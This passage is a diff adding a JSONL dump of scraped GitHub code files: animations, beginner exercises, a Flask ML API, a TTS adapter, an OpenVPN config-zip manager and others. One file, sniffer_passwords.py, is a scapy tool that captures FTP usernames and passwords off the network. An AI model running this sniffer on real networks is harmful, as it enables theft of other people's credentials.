diff --git "a/3674.jsonl" "b/3674.jsonl" new file mode 100644--- /dev/null +++ "b/3674.jsonl" @@ -0,0 +1,815 @@ +{"seq_id":"27650961227","text":"from random import randrange, choice\r\nfrom threading import Thread\r\nfrom time import sleep\r\n\r\nfrom center_print import print\r\n\r\nrunning = False\r\n\r\n\r\ndef scrambler(animation_text):\r\n chars = '#*@!?$%+&'\r\n animation_text = animation_text.split()\r\n\r\n while True:\r\n text = list()\r\n for word in animation_text:\r\n word = list(word)\r\n word[randrange(len(word))] = choice(chars)\r\n text.append(''.join(word))\r\n if running:\r\n print(' '.join(text), end='\\r')\r\n sleep(0.05)\r\n else:\r\n return\r\n\r\n\r\ndef animate(message_text='', end=0):\r\n global running\r\n if not end:\r\n running = True\r\n t = Thread(target=scrambler, args=(message_text,))\r\n t.start()\r\n else:\r\n running = False\r\n sleep(0.1)\r\n if message_text:\r\n blink(message_text)\r\n\r\n\r\n# printProgressBar function has been written by Greenstick at https://gist.github.com/greenstick/c34d044225293c9b191f\r\ndef printProgressBar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█'):\r\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n filledLength = int(length * iteration // total)\r\n bar = fill * filledLength + '-' * (length - filledLength)\r\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end='\\r')\r\n if iteration == total:\r\n print('\\r Pages collected ', center=0)\r\n\r\n\r\ndef blink(message):\r\n print(message, end='\\r')\r\n sleep(0.3)\r\n print(' ' * 120, end='\\r')\r\n sleep(0.2)\r\n print(message, end='\\r')\r\n sleep(0.1)\r\n print(' ' * 120, end='\\r')\r\n sleep(0.1)\r\n print(message)\r\n","repo_name":"ankit1w/OCD","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24316972444","text":"'''\nDesafio 003 - Feito\nCrie um programa que leia dois números e tente mostrar a soma entre eles.\nExemplo:\n\"Primeiro número: 6\"\n\"Segundo número: 3\"\n\"A soma é 63 (errado, o certo é 9)\"\nJuntar uma string na outra é concatenação, somar não é concatenar.\n'''\n\n# 1ª forma\np_num = int(input('Primeiro número: ')) # Quando se abre um \"input\" sem difinir nada antes, o Python assume que é string, nesse caso a soma não daria certo.\ns_num = int(input('Segundo número: ')) # \"int\" funciona melhor para números inteiros do que \"float\".\nprint('A soma é:', (p_num + s_num)) # Aqui o \"+\" não funciona, pois não se pode concatenar com \"+\" str com int, tem que usar \",\".\n\nprint('')\n\n# 2ª forma\nn1 = int(input('Digite um valor: '))\nn2 = int(input('Digite outro valor: '))\ns = n1 + n2\nprint('A soma vale', s)\n\nprint('')\n\n# 3ª forma\nn1 = int(input('Primeiro número: '))\nn2 = int(input('Segundo número: '))\nsoma = n1 + n2\nprint('A soma vale: {}'.format(soma))\n\nprint('')\n\n# 4ª forma\nn1 = int(input('Primeiro número: '))\nn2 = int(input('Segundo número: '))\nsoma = n1 + n2\nprint('A soma entre', n1 , 'e', n2 , 'vale {}.'.format(soma)) # Com a \",\" no final ficava um espaço entre o número da soma e o \".\".\n\nprint('')\n\n# 5ª forma\nn1 = int(input('Primeiro número: '))\nn2 = int(input('Segundo número: '))\nsoma = n1 + n2\nprint('A soma entre {} e {} vale {}.'.format(n1, n2, soma)) # A forma máis prática de 
representar.\n","repo_name":"marcosmorandi/exercicios-python","sub_path":"desafios/d003.py","file_name":"d003.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39481110295","text":"#!/usr/bin/python3\nfrom flask import *\nfrom flask_restful import *\nfrom json import dumps\nimport subprocess\n\nfrom AIengine import *\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\napp = Flask(__name__)\napi = Api(app)\n\nprivateModels = dict()\n\nuserModelRoot = lambda obj: './models/'# + obj['user']\n\nclass Classify(Resource):\n def post(self):\n # Get Data (Image/Vector), type (img,vec), 'user' - username\n obj = request.get_json(force=True)\n #print(obj)\n if obj['user'] not in privateModels:\n # Not yet loaded in memory, load it\n privateModels[obj['user']] = AIengine(userModelRoot(obj))\n images = np.array(obj['data'])\n if obj['preprocess'] == True:\n images, status = AIengine.preprocess(images)\n results, status = privateModels[obj['user']].classify(images, clfType = obj['type'])\n #print(np.array(obj['data']).shape)\n print(results)\n return jsonify(results)\n\n \nclass Train(Resource):\n def post(self):\n # Get Data (Image/Vector), labels (Names), type (img,vec), 'user' - username\n obj = request.get_json(force=True)\n #print(obj)\n if obj['user'] not in privateModels:\n # Not yet loaded in memory, load it\n privateModels[obj['user']] = AIengine(userModelRoot(obj))\n images = np.array(obj['data'])\n if obj['preprocess'] == True:\n images, status = AIengine.preprocess(images)\n results, status = privateModels[obj['user']].fit(images, obj['labels'], obj['type'])\n privateModels[obj['user']].save(userModelRoot(obj))\n #print(results)\n return jsonify(results)\n\n\nclass Similarity(Resource):\n def post(self):\n # Get Data (Image1, data), 'user' - username, type = img if data is img, else vec\n obj = request.get_json(force=True)\n #print(obj)\n if obj['user'] not in privateModels:\n # Not yet loaded in memory, load it\n privateModels[obj['user']] = AIengine(userModelRoot(obj))\n img = np.array([obj['img']])\n if obj['preprocess'] == True:\n img, status = AIengine.preprocess(img)\n\n if obj['type'] == 'img':\n data = np.array([obj['data']])\n if obj['preprocess'] == True:\n data, status = AIengine.preprocess(data)\n results = privateModels[obj['user']].isSimilarII(img, data)\n else :\n results = privateModels[obj['user']].isSimilarIV(np.array([obj['img']]), np.array([obj['data']]))\n privateModels[obj['user']].save(userModelRoot(obj))\n print(results)\n return jsonify(results)\n\nclass loadModel(Resource):\n def post(self):\n obj = request.get_json(force=True)\n privateModels[obj['user']] = AIengine(userModelRoot(obj))\n return jsonify(\"Loaded\")\n\nclass saveModel(Resource):\n def post(self):\n obj = request.get_json(force=True)\n privateModels[obj['user']].save(userModelRoot(obj))\n return jsonify(\"Saved\")\n\nclass createModel(Resource):\n def post(self):\n obj = request.get_json(force=True)\n privateModels[obj['user']] = AIengine(userModelRoot(obj), create=True)\n return jsonify(\"Created\")\n\napi.add_resource(Classify, '/classify')\n\napi.add_resource(Train, '/train')\napi.add_resource(Similarity, '/similarity')\n\napi.add_resource(saveModel, '/save')\napi.add_resource(loadModel, '/load')\n\napi.add_resource(createModel, '/create')\n\n# WARNING: DO NOT RUN THIS ON MULTITHREADED WSGI SERVERS!\nif __name__ == '__main__':\n app.run(host='0.0.0.0', 
port='5000')\n\n\n\n","repo_name":"AshishKumar4/EagleEye","sub_path":"cloud_generator.py","file_name":"cloud_generator.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10204425452","text":"#!/usr/bin/env python3\n\"\"\"\nRuns a text to speech command that returns WAV audio on stdout or in a temp file.\n\"\"\"\nimport argparse\nimport io\nimport logging\nimport shlex\nimport subprocess\nimport tempfile\nimport wave\nfrom pathlib import Path\n\nfrom rhasspy3.audio import DEFAULT_SAMPLES_PER_CHUNK, AudioChunk, AudioStart, AudioStop\nfrom rhasspy3.event import read_event, write_event\nfrom rhasspy3.tts import Synthesize\n\n_FILE = Path(__file__)\n_DIR = _FILE.parent\n_LOGGER = logging.getLogger(_FILE.stem)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"command\",\n help=\"Command to run\",\n )\n parser.add_argument(\n \"--temp_file\",\n action=\"store_true\",\n help=\"Command has {temp_file} and will write output to it\",\n )\n parser.add_argument(\n \"--text\",\n action=\"store_true\",\n help=\"Command has {text} argument\",\n )\n #\n parser.add_argument(\n \"--samples-per-chunk\", type=int, default=DEFAULT_SAMPLES_PER_CHUNK\n )\n #\n parser.add_argument(\n \"--debug\", action=\"store_true\", help=\"Print DEBUG messages to console\"\n )\n args = parser.parse_args()\n logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)\n\n try:\n while True:\n event = read_event()\n if event is None:\n break\n\n if Synthesize.is_type(event.type):\n synthesize = Synthesize.from_event(event)\n wav_bytes = text_to_wav(args, synthesize.text)\n with io.BytesIO(wav_bytes) as wav_io:\n with wave.open(wav_io, \"rb\") as wav_file:\n rate = wav_file.getframerate()\n width = wav_file.getsampwidth()\n channels = wav_file.getnchannels()\n\n num_frames = wav_file.getnframes()\n audio_bytes = wav_file.readframes(num_frames)\n\n bytes_per_chunk = args.samples_per_chunk * width\n timestamp = 0\n write_event(\n AudioStart(rate, width, channels, timestamp=timestamp).event()\n )\n while audio_bytes:\n chunk = AudioChunk(\n rate,\n width,\n channels,\n audio_bytes[:bytes_per_chunk],\n timestamp=timestamp,\n )\n write_event(chunk.event())\n timestamp += chunk.milliseconds\n audio_bytes = audio_bytes[bytes_per_chunk:]\n\n write_event(AudioStop(timestamp=timestamp).event())\n except KeyboardInterrupt:\n pass\n\n\ndef text_to_wav(args: argparse.Namespace, text: str) -> bytes:\n command_str = args.command\n format_args = {}\n if args.text:\n format_args[\"text\"] = text\n text = \"\" # Pass as arg instead\n\n if args.temp_file:\n with tempfile.NamedTemporaryFile(mode=\"wb\", suffix=\".wav\") as wav_file:\n format_args[\"temp_file\"] = wav_file.name\n command_str = command_str.format(**format_args)\n command = shlex.split(command_str)\n\n # Send stdout to devnull so it doesn't interfere with our events\n subprocess.run(\n command, check=True, stdout=subprocess.DEVNULL, input=text.encode()\n )\n wav_file.seek(0)\n return Path(wav_file.name).read_bytes()\n\n else:\n command_str = command_str.format(**format_args)\n command = shlex.split(command_str)\n return subprocess.check_output(command, input=text.encode())\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"rhasspy/rhasspy3","sub_path":"bin/tts_adapter_text2wav.py","file_name":"tts_adapter_text2wav.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"72"} +{"seq_id":"2431576210","text":"from PIL import Image, ImageDraw\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef greyval(pixel):\r\n return (pixel[0] + pixel[1] + pixel[2]) // 3\r\n\r\n\r\nimage = Image.open(\"./images/Unequalized_Hawkes_Bay_NZ.jpg\")\r\npix = image.load()\r\n\r\nH = [0 for i in range(256)]\r\n\r\nfor i in range(image.size[0]):\r\n for j in range(image.size[1]):\r\n H[greyval(pix[i, j])] += 1\r\n\r\nCH = [0 for i in range(256)]\r\n\r\nCH[0] = H[0]\r\nfor i in range(1, 256):\r\n CH[i] = CH[i-1] + H[i]\r\n\r\nT = [0 for i in range(256)]\r\nfor i in range(256):\r\n T[i] = round((255*CH[i])/(image.size[0]*image.size[1]))\r\n\r\nnew = Image.new(\"RGB\", image.size)\r\ndraw = ImageDraw.Draw(new)\r\nfor i in range(image.size[0]):\r\n for j in range(image.size[1]):\r\n current_pix_grey_val = T[greyval(pix[i, j])]\r\n draw.point((i, j), (current_pix_grey_val,\r\n current_pix_grey_val, current_pix_grey_val))\r\n\r\nnew.save(\"new.jpg\", \"JPEG\")\r\n\r\npix = new.load()\r\nnewH = [0 for i in range(256)]\r\nfor i in range(image.size[0]):\r\n for j in range(image.size[1]):\r\n newH[greyval(pix[i, j])] += 1\r\n\r\nfig, (ax1, ax2) = plt.subplots(\r\n nrows=1, ncols=2,\r\n figsize=(16, 8)\r\n)\r\nax1.bar(range(1, 257), H, color='blue')\r\nax1.set_title('Гистограмма изображения до эквализации')\r\nax2.bar(range(1, 257), newH, color='green')\r\nax2.set_title('Гистограмма изображения после эквализации')\r\nplt.show()\r\n","repo_name":"SonyaVitkovskaya/BSUIR","sub_path":"OIIS/лаб_1/gistogramma.py","file_name":"gistogramma.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18199231787","text":"#!/usr/bin/env python\n# _*_ coding: utf8 _*_\n\nfrom scapy.all import *\nimport argparse\n\nparse = argparse.ArgumentParser()\nparse.add_argument(\"-i\",\"--interface\",help=\"Interfaz de red..\")\nparse = parse.parse_args()\n\ndef sniffer_ftp(pkt):\n\tif pkt[TCP].dport == 21:\n\t\tdata = pkt.sprintf(\"%Raw.load%\")\n\t\tif \"USER\" in data:\n\t\t\tprint(\"FTP IP: \"+ pkt[IP].dst)\n\t\t\tdata = data.split(\" \")\n\t\t\tdata = data[1]\n\t\t\tprint(\"USUARIO FTP: \" + data)\n\t\telif \"PASS\" in data:\n\t\t\tdata = data.split(\" \")\n\t\t\tdata = data[1]\n\t\t\tprint(\"CONTRASEÑA: \" + data)\n\ndef main():\n\tif parse.interface:\n\t\tprint(\"Sniffeando ...\")\n\t\tsniff(iface=parse.interface, filter=\"tcp and port 21\", prn=sniffer_ftp)\n\telse:\n\t\tprint(\"Necesito una interfaz de red..\")\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"5pok/python_scapy","sub_path":"sniffer_passwords.py","file_name":"sniffer_passwords.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32862585965","text":"from time import*\nfrom random import randint\n#with open('tx.txt') as f:\n# print(f.readline())\n'''\nclass RunningCodeJudge:\n def __init__(self):\n self.start = None\n\n def __enter__(self):\n self.start = time()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n t = time() - self.start\n print(f'{exc_tb}\\n{exc_val}\\n{exc_tb}')\n print(f'Время выполнения: {t}')\n return True\n\nwith RunningCodeJudge():\n lst = [abs(i) for i in 
range(1_000_000)]\n lst - 1\n\nlst = [1, 2 , 3]\nmy_iterator = iter(lst)\n\nfor i in my_iterator:\n print(i)'''\n\nclass RandomIter:\n def __init__(self, limit):\n self.limit = limit\n self.__reload = limit\n\n def __iter__(self):\n self.limit == self.__reload\n return self\n\n def __next__(self):\n if self.limit == 0:\n raise StopIteration # принудительно вызывает ошибку\n self.limit -= 1\n return randint(1, 100)\n\nrand_iter = RandomIter(5)\nfor i in rand_iter:\n print(i)\n\nrand_iter = RandomIter(9)\nfor i in rand_iter:\n print(i)","repo_name":"Nikolay1562005/Training_file","sub_path":"хз.py","file_name":"хз.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16239704072","text":"class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nhead = None\nsize_of_ll = 0\n\n\ndef insert_node(position, value):\n global head\n global size_of_ll\n if position >= 1 and position <= size_of_ll + 1:\n temp = ListNode(value)\n if position == 1:\n temp.next = head\n head = temp\n else:\n count = 1\n prev = head\n while count < position - 1:\n prev = prev.next\n count += 1\n temp.next = prev.next\n prev.next = temp\n size_of_ll += 1\n\n\ndef delete_node(position):\n global head\n global size_of_ll\n if position >= 1 and position <= size_of_ll:\n temp = None\n if position == 1:\n temp = head\n head = head.next\n else:\n count = 1\n prev = head\n while count < position - 1:\n prev = prev.next\n count += 1\n temp = prev.next\n prev.next = prev.next.next\n size_of_ll -= 1\n\n\ndef print_ll():\n global head\n tmp = head\n ans = []\n while tmp is not None:\n ans.append(str(tmp.val))\n tmp = tmp.next","repo_name":"aman-bcalm/Scaler-Problems","sub_path":"Day 21/LinkedListSoln.py","file_name":"LinkedListSoln.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15102272534","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;\n\nimport os\nimport sys\nfrom arsoft.zipfileutils import ZipFileEx\nimport arsoft.crypto\nfrom arsoft.sshutils import *\nfrom OpenSSL import crypto\nfrom .configfile import ConfigFile\nfrom .systemconfig import SystemConfig\nimport arsoft.utils\nimport zipfile\nimport io\n\nclass ZipError(Exception):\n pass\n\nclass ZippedConfigFile(object):\n\n def __init__(self, filename=None, mode='r'):\n self.filename = filename\n self.mode = mode\n self._zip = None\n self._config_file_info = None\n self.last_error = None\n\n def __str__(self):\n if self._zip:\n return str(self.__class__.__name__) + '(%s;%s)' % (self.filename, self.name)\n else:\n return str(self.__class__.__name__) + '(%s)' % (self.filename)\n\n def _ensure_open(self):\n if self._zip is None:\n ret = self.open()\n else:\n ret = True\n return ret\n\n def open(self, filename=None, mode=None):\n if filename is None:\n filename = self.filename\n if mode is None:\n mode = self.mode\n\n try:\n self._zip = ZipFileEx(filename, mode)\n except zipfile.BadZipfile as e:\n self.last_error = e\n self._zip = None\n except IOError as e:\n self.last_error = e\n self._zip = None\n ret = True if self._zip else False\n return ret\n\n @staticmethod\n def is_zip_config_file(filename, mode='r'):\n try:\n fobj = ZipFileEx(filename, mode)\n if fobj:\n config_file_info = None\n fileinfolist = fobj.infolist()\n for fileinfo in fileinfolist:\n (basename, ext) = 
os.path.splitext(fileinfo.filename)\n if ext == '.ovpn' or ext == '.conf':\n config_file_info = fileinfo\n break\n ret = True if config_file_info else False\n fobj.close()\n else:\n ret = False\n except zipfile.BadZipfile as e:\n ret = False\n return ret\n\n @staticmethod\n def _create_add_file_to_zip(zipfile_fobj, cfgfile, file_to_add, arcname=None):\n if cfgfile.config_directory:\n source_file = os.path.join(cfgfile.config_directory, file_to_add)\n else:\n source_file = file_to_add\n if os.path.isfile(source_file):\n zipfile_fobj.write(source_file, arcname if arcname else file_to_add)\n ret = True\n error = None\n else:\n ret = False\n error = 'File %s does not exist' %(source_file)\n return (ret, error)\n\n @staticmethod\n def _create_add_key_file_to_zip(zipfile_fobj, cfgfile, file_to_add, key_passphrase=None, arcname=None):\n if cfgfile.config_directory:\n source_file = os.path.join(cfgfile.config_directory, file_to_add)\n else:\n source_file = file_to_add\n if os.path.isfile(source_file):\n org_keyfile = arsoft.crypto.KeyPEMFile(source_file)\n \n ret = org_keyfile.open()\n if ret:\n zip_keyfile_stream = io.BytesIO()\n ret = org_keyfile.export(zip_keyfile_stream, key_passphrase)\n if ret:\n data = zip_keyfile_stream.getvalue()\n zipfile_fobj.writestr(arcname if arcname else file_to_add, data)\n error = None\n else:\n ret = False\n error = 'File %s does not exist' %(source_file)\n return (ret, error)\n\n @staticmethod\n def create(cfgfile, output_file, key_passphrase=None):\n zip_cfgfile = cfgfile.clone()\n zip_ostype = cfgfile.ostype\n try:\n fobj = ZipFileEx(output_file, 'w')\n if fobj:\n ret = True\n if zip_ostype == 'windows' or zip_ostype == 'macosx':\n # create a flat zip file\n zip_private_directory = ''\n else:\n zip_private_directory = cfgfile.suggested_private_directory + '/'\n\n if ret and cfgfile.cert_filename:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.cert_filename, zip_private_directory + 'cert.pem')\n if ret:\n zip_cfgfile.cert_filename = zip_private_directory + 'cert.pem'\n if ret and cfgfile.key_filename:\n try:\n if key_passphrase:\n ret, error = ZippedConfigFile._create_add_key_file_to_zip(fobj, cfgfile, cfgfile.key_filename, key_passphrase, zip_private_directory + 'key.pem')\n else:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.key_filename, zip_private_directory + 'key.pem')\n except arsoft.crypto.PrivateKeyError as e:\n error = e\n ret = False\n if ret:\n zip_cfgfile.key_filename = zip_private_directory + 'key.pem'\n if ret and cfgfile.ca_filename:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.ca_filename, zip_private_directory + 'ca.pem')\n if ret:\n zip_cfgfile.ca_filename = zip_private_directory + 'ca.pem'\n if ret and cfgfile.dh_filename:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.dh_filename, zip_private_directory + 'dh.pem')\n if ret:\n zip_cfgfile.dh_filename = zip_private_directory + 'dh.pem'\n if ret and cfgfile.crl_filename:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.crl_filename, zip_private_directory + 'crl.pem')\n if ret:\n zip_cfgfile.crl_filename = zip_private_directory + 'crl.pem'\n if ret and cfgfile.auth_user_pass_file:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.auth_user_pass_file, zip_private_directory + 'auth_pass')\n if ret:\n zip_cfgfile.auth_user_pass_file = zip_private_directory + 'auth_pass'\n if ret and 
cfgfile.client_config_directory:\n #print('ccd dir %s' % (cfgfile.client_config_directory))\n zip_cfgfile.client_config_directory = zip_private_directory + 'ccd'\n for (client_name, client_config_file) in cfgfile.client_config_files.items():\n #print('add %s as %s' % (client_config_file, client_name))\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, client_config_file.filename, zip_private_directory + 'ccd/' + client_name)\n if not ret:\n break\n if ret:\n zip_cfgfile.name = cfgfile.name\n zip_cfgfile_buf = io.BytesIO()\n zip_cfgfile_stream = io.TextIOWrapper(zip_cfgfile_buf)\n ret = zip_cfgfile.save(zip_cfgfile_stream)\n if ret:\n zip_cfgfile_stream.flush()\n fobj.writestr(zip_cfgfile.suggested_filename, zip_cfgfile_buf.getvalue())\n fobj.close()\n output_zip = ZippedConfigFile(output_file)\n if not ret:\n #if hasattr(output_file, 'write'):\n # os.remove(output_file.name)\n #else:\n # os.remove(output_file)\n output_zip.last_error = error\n ret = output_zip\n else:\n ret = None\n except zipfile.BadZipfile as e:\n raise ZipError(e)\n return ret\n\n @property\n def valid(self):\n ret = self._find_config_file()\n return ret\n\n def close(self):\n if self._zip is not None:\n self._zip.close()\n self._zip = None\n self._config_file_info = None\n \n def _find_config_file(self):\n if self._config_file_info is None:\n if self._ensure_open():\n fileinfolist = self._zip.infolist()\n for fileinfo in fileinfolist:\n (basename, ext) = os.path.splitext(fileinfo.filename)\n if ext == '.ovpn' or ext == '.conf':\n self._config_file_info = fileinfo\n break\n return True if self._config_file_info is not None else False\n \n def _find_file(self, filename):\n ret = None\n if self._ensure_open():\n fileinfolist = self._zip.infolist()\n for fileinfo in fileinfolist:\n if fileinfo.filename == filename:\n ret = fileinfo\n break\n return ret\n\n @property\n def name(self):\n cfgfile = self.config_file\n if cfgfile is not None:\n return cfgfile.name\n else:\n return None\n\n @property\n def config_filename(self):\n self._find_config_file()\n return self._config_file_info.filename if self._config_file_info else None\n\n @property\n def config_file(self):\n self._find_config_file()\n fp = self._zip.open(self._config_file_info.filename, self.mode) if self._config_file_info else None\n if not fp:\n return None\n # need to create a text IO wrapper because the ConfigFile requires a text stream and not a binary one\n txtfp = io.TextIOWrapper(fp)\n ret = ConfigFile(txtfp, zipfile=self)\n return ret\n \n def get_files_in_directory(self, dirname):\n ret = []\n fileinfolist = self._zip.infolist()\n for fileinfo in fileinfolist:\n if fileinfo.filename.startswith(dirname):\n ret.append(fileinfo.filename)\n return ret\n \n def extractall(self, target_directory):\n if self._ensure_open():\n self._zip.extractall(target_directory)\n ret = True\n else:\n ret = False\n return ret\n\n def __getitem__(self, name):\n fileinfo = self._find_file(name)\n return self._zip.open(fileinfo.filename, self.mode) if fileinfo else None\n \n def __iter__(self):\n if self._ensure_open():\n return iter(self._zip)\n else:\n return None\n \n def extract(self, name, target_directory, target_name=None):\n #print('extract %s to %s' %(name, target_directory))\n if self._ensure_open():\n if target_name is None:\n self._zip.extract(name, target_directory)\n ret = True\n else:\n dstname = os.path.join(target_directory, target_name)\n fileinfo = self._find_file(name)\n if fileinfo:\n fsrc = self._zip.open(fileinfo.filename, 'r')\n fdst = 
open(dstname, 'w')\n buf_length = 4096\n while 1:\n buf = fsrc.read(buf_length)\n if not buf:\n break\n fdst.write(buf)\n fsrc.close()\n fdst.close()\n ret = True\n else:\n ret = False\n else:\n ret = False\n return ret\n\n def install(self, autoStart=True, config_directory=None, root_directory=None):\n if config_directory is None:\n config_directory = '/etc/openvpn'\n if root_directory is None:\n target_config_directory = config_directory\n else:\n target_config_directory = root_directory + config_directory\n\n cfgfile = self.config_file\n ret = True if cfgfile else False\n if ret:\n if not os.path.isdir(target_config_directory):\n try:\n os.makedirs(target_config_directory)\n ret = True\n except IOError as OSError:\n ret = False\n if ret:\n private_config_directory = os.path.join(target_config_directory, cfgfile.suggested_private_directory)\n if not os.path.isdir(private_config_directory):\n try:\n os.makedirs(private_config_directory)\n ret = True\n except IOError as OSError:\n ret = False\n if ret and cfgfile.cert_filename:\n ret = self.extract(cfgfile.cert_filename, private_config_directory, 'cert.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'cert.pem'), target_config_directory)\n cfgfile.cert_filename = new\n if ret and cfgfile.key_filename:\n ret = self.extract(cfgfile.key_filename, private_config_directory, 'key.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'key.pem'), target_config_directory)\n cfgfile.key_filename = new\n if ret and cfgfile.ca_filename:\n ret = self.extract(cfgfile.ca_filename, private_config_directory, 'ca.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'ca.pem'), target_config_directory)\n cfgfile.ca_filename = new\n if ret and cfgfile.dh_filename:\n ret = self.extract(cfgfile.dh_filename, private_config_directory, 'dh.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'dh.pem'), target_config_directory)\n cfgfile.dh_filename = new\n if ret and cfgfile.crl_filename:\n ret = self.extract(cfgfile.crl_filename, private_config_directory, 'crl.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'crl.pem'), target_config_directory)\n cfgfile.crl_filename = new\n if ret and cfgfile.auth_user_pass_file:\n ret = self.extract(cfgfile.crl_filename, private_config_directory, 'auth_pass')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'auth_pass'), target_config_directory)\n cfgfile.auth_user_pass_file = new\n if ret and cfgfile.client_config_directory:\n private_config_directory_ccd = os.path.join(private_config_directory, 'ccd')\n if not os.path.isdir(private_config_directory_ccd):\n try:\n os.makedirs(private_config_directory_ccd)\n ret = True\n except IOError as OSError:\n ret = False\n if ret:\n for (client_name, client_config_file) in cfgfile.client_config_files.items():\n ret = self.extract(client_config_file.filename, private_config_directory_ccd, client_name)\n if not ret:\n break\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'ccd'), target_config_directory)\n cfgfile.client_config_directory = new\n if ret:\n cfgfile.status_file = cfgfile.suggested_status_file\n cfgfile.status_version = cfgfile.suggested_status_version\n cfgfile.management = cfgfile.suggested_management\n if ret:\n target_config_file = os.path.join(target_config_directory, cfgfile.suggested_filename)\n ret = cfgfile.save(target_config_file)\n if not ret:\n self.last_error = cfgfile.last_error\n\n if 
ret:\n syscfg = SystemConfig(root_directory=root_directory)\n vpnname, ext = os.path.splitext(cfgfile.suggested_filename)\n new_autostart = syscfg.autostart\n if autoStart:\n new_autostart.add(vpnname)\n else:\n new_autostart.remove(vpnname)\n syscfg.autostart = new_autostart\n ret = syscfg.save()\n return ret\n\n def ssh_install(self, target_hostname, username=None, keyfile=None, stdout=None, stderr=None, \n outputStdErr=False, outputStdOut=False, allocateTerminal=False, x11Forwarding=False,\n cwd=None, env=None,\n verbose=False):\n try:\n inputfile = open(self.filename, 'r')\n except IOError as e:\n self.last_error = e\n inputfile = None\n if inputfile:\n # copy zip file to target host as stdin file\n commandline = '/usr/sbin/openvpn-admin --install -'\n\n (sts, stdout, stderr) = ssh_runcmdAndGetData(target_hostname, commandline=commandline, script=None, \n outputStdErr=outputStdErr, outputStdOut=outputStdOut, stdin=inputfile, stdout=stdout, stderr=stderr, cwd=cwd, env=env,\n allocateTerminal=allocateTerminal, x11Forwarding=x11Forwarding,\n keyfile=keyfile, username=username, verbose=verbose)\n sts = 0\n ret = True if sts == 0 else False\n inputfile.close()\n else:\n ret = False\n return ret\n \n @staticmethod\n class zip_config_compare_functor(object):\n def __init__(self, key_passphrase):\n self.key_passphrase = key_passphrase\n\n def __call__(self, selfzip, selfinfo, otherzip, otherinfo):\n ret = True\n if selfinfo.CRC != otherinfo.CRC:\n if os.path.basename(selfinfo.filename) == 'key.pem':\n selffp = selfzip.open(selfinfo)\n otherfp = otherzip.open(otherinfo)\n\n selfcontent = selffp.read()\n othercontent = otherfp.read()\n selffp.close()\n otherfp.close()\n\n ret = arsoft.crypto.compare_pem_key(selfcontent, othercontent, passphrase=self.key_passphrase)\n else:\n ret = False\n\n return ret\n \n def compare(self, otherzip, key_passphrase=None):\n if isinstance(otherzip, ZippedConfigFile):\n real_otherzip = otherzip._zip\n elif isinstance(otherzip, str):\n try:\n real_otherzip = ZipFileEx(otherzip, 'r')\n except zipfile.BadZipfile as e:\n self.last_error = e\n real_otherzip = None\n except IOError as e:\n self.last_error = e\n real_otherzip = None\n else:\n real_otherzip = otherzip\n self._ensure_open()\n if self._zip is None:\n return True if real_otherzip is None else False\n else:\n cmpfunc = ZippedConfigFile.zip_config_compare_functor(key_passphrase)\n return self._zip.compare(real_otherzip, date_time=False, content=True, compare_functor=cmpfunc)\n\nif __name__ == '__main__':\n c = ZippedConfigFile(sys.argv[1])\n\n print(c)\n print(c.config_file)\n print(c.config_file.ca_file)\n print(c[c.config_file.ca_file])\n print(iter(c))\n for f in iter(c):\n print(f.name)\n","repo_name":"aroth-arsoft/arsoft-python","sub_path":"python3/arsoft/openvpn/zippedconfigfile.py","file_name":"zippedconfigfile.py","file_ext":"py","file_size_in_byte":19551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3248558794","text":"# -*- coding: utf-8 -*-\r\n\"\"\"Unit tests for message pipeline.\r\n\r\nThese tests make sure the message handling works as it should. 
